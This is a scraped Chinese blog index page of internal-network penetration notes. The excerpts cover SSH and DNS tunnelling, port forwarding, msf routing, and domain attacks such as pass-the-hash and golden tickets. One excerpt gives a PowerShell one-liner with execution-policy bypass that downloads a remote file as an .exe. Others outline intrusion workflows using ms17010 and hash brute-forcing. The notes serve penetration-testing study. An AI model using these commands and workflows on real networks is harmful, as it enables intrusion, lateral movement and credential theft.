内网渗透
文章平均质量分 50
111
Mamba start
.
展开
-
windows远程下载
文章目录windows远程下载windows远程下载powershell -exec bypass -c (new-object System.Net.WebClient).downloadfile(' 下载文件路径 ','C:\本地生成文件的名字.exe')原创 2021-03-07 15:39:58 · 828 阅读 · 0 评论 -
ssh隧道
文章目录ssh隧道原理ssh本地端口转发原理ssh远程端口转发原理ssh动态端口转发原理ssh隧道原理ssh本地端口转发原理本地ssh端口转发通常是边界服务器有外网网卡和内网网卡,则数据就是像图中顺时针走,这就叫本地ssh端口转发。使用场景:我们想从vps访问图中数据库服务器,但无法直接访问,所以需要使用web做为跳板,搭建ssh隧道ssh远程端口转发原理ssh远程端口转发:通常边界服务器没有外网网卡,所以,我们(vps)找不到它,让它来找我们,这也就是远程端口转发使用场景:我们原创 2021-03-06 20:48:24 · 772 阅读 · 0 评论 -
隧道技术的选择
原创 2021-03-06 19:48:44 · 602 阅读 · 0 评论 -
DNS隧道-iodine使用
iodine可以通过一台dns服务器制造一个IPv4数据通道,特别适合在目标主机只能发送dns请求的网络中环境中使用。iodine是基于C语言开发的,分为服务端程序iodined和客户端程序iodine。iodine支持EDNS、base32,base64,base128等多种编码规范。 GitHub:https://github.com/boazsegev/iodine iodine支持直接转发和中继两种模式,其原理是通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立转载 2021-03-06 19:38:42 · 802 阅读 · 1 评论 -
dnscat2搭建dns隧道
域名购买网站:https://dcc.godaddy.com/ 购买域名,并且注册网站,应用该模块安装服务端:apt-get install gemapt-get install ruby-devapt-get install libpq-devcd dnscat2/servergit clone https://github.com/iagox86/dnscat2.git编译bundle install中继模式启动服务端sudo ruby ./dnscat2.rb vpn.xxx -e转载 2021-03-06 13:40:20 · 1598 阅读 · 2 评论 -
内网渗透简单思路
内网渗透简单思路无域环境1.nessus或goby扫描2.尝试ms17010(win7),ms0708(win server),ms0796(win10)等3.并可以内网嗅探,dns欺骗,内网钓鱼等有域环境1.寻找域内管理员,拿到域管理员权限并提权2.内网渗透,爆hash批处理尝试登陆3.有时候目标在内网或有防火墙,想实现3389或ssh连接这时候就要尝试搞个端口转发4.如果内网有防火墙,尝试添加隧道代理或者从网络层应用层面搭建隧道...原创 2020-10-19 15:46:37 · 1007 阅读 · 0 评论 -
内网渗透-路由添加
文章目录前言msf实现路由添加msf查看网卡情况,并且添加路由利用proxychain配合socks4代理渗透前言在内网渗透的时候,有时候我们想继续探测内网的资源,但是由于防火墙的原因导致我们无法继续访问内部资源,此时我们就可以考虑添加路由或者端口转发等技术。msf实现路由添加msf查看网卡情况,并且添加路由#获取当前主机下的网络架构分布run get_local_subnets添加路由访问run autoroute -s 192.168.22.0/24查看当前路由列表ru原创 2020-10-19 15:22:24 · 1121 阅读 · 0 评论 -
内网渗透-域内有网和无网
文章目录前言域内主机有网攻击流程域内主机无网操作流程前言在渗透测试的过程中,拿下域内一台主机以后,有时候内网的其他主机有网,有时候没网,此时,如果有网我们就按常规的渗透测试即可,如果没网我们就应该以该主机作为跳板,使用socks协议或其他办法,从而实现与无网的主机进行通信域内主机有网攻击流程通过域环境webserver主机的外网WEB服务开启到域控权限的获取假如已经获取webserver权限:0x01:通过phpmyadmin弱口令getshell0x02:msf生成 msf监听原创 2020-10-18 21:11:10 · 781 阅读 · 0 评论 -
内网渗透-端口转发
目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理(Linux) Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 LCX实现本地端口转发(Windows的场景) LCX实...转载 2020-10-18 21:15:10 · 1214 阅读 · 0 评论 -
内网渗透-域渗透简单思路
文章目录1.权限提升2.渗透姿势爆hash,爆aes key爆hash爆aes key3.远程登录注册表修改连接命令4.连接操作PTH攻击(利用明文或hash连接)IPC(明文连接主机)WMI(利用明文连接)SMB(利用明文或hash连接)RDP(利用明文或hash连接)WMI工具(利用明文或hash连接)PTK攻击(aes key 进行连接)PTT攻击(权限维持)Golden ticket(黄金票据)silver ticket(白银票据)5.bat批量连接测试1.权限提升一开始一定要提到admini原创 2020-10-16 18:04:55 · 4320 阅读 · 1 评论 -
内网渗透-域内信息收集
文章目录域内基础信息收集查询域查询域内所有计算机查询所有域成员计算机列表获取域信任查询域控器查域控器的主机名查询域控组获取域内用户和管理员信息查询所有域用户列表向控制器进行查询获取域内用户的详细信息查看存中的用户查看本地管理员用户查询域管理员用户查询域管理员用户查询管理员用户组定位域管理员查找域管理员获取域管理员列表查询域控列表列出本机所有进程及用户域内基础信息收集查询域net view /domain查询域内所有计算机net view /domain:GOD##查询域内所有用户列表原创 2020-10-14 22:28:45 · 611 阅读 · 0 评论 -
内网渗透-工作组信息收集
文章目录查询网络配置查询用户列表查询进程列表查询操作系统及安装软件的版本查询端口列表查询补丁列表查询本机共享查询防火墙配置和关闭防护墙查询并开启远程连接服务查询当前权限获取域的sid查询指定用户详细信息查询网络配置ipconfig /all看是否有域,是内网还是外网,或者有两个网卡,有内网又有外网查询用户列表net user 用户列表net localgroup administrator 查询本地管理员和组query user || qwinsta 查看当前在线用户----->&原创 2020-10-14 21:04:29 · 541 阅读 · 0 评论